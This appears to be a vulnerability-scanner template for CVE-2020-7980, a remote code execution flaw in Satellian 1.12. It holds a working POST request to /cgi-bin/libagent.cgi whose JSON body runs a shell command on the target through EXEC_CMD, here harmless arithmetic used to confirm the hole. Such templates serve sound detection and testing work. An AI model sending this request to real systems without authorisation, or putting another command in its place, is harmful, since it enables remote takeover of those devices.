id: CVE-2020-7980

info:
    name: Satellian 1.12 Remote Code Execution
    author: JingLing(https://hackfun.org/)
    severity: critical

set:
    r1: randomInt(800000000, 1000000000)
    r2: randomInt(800000000, 1000000000)
rules:
    r0:
        request:
            method: POST
            path: /cgi-bin/libagent.cgi?type=J
            headers:
                Content-Type: application/json
                Cookie: ctr_t=0; sid=123456789
            body: '{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1}'
            follow_redirects: true
        expression: response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()
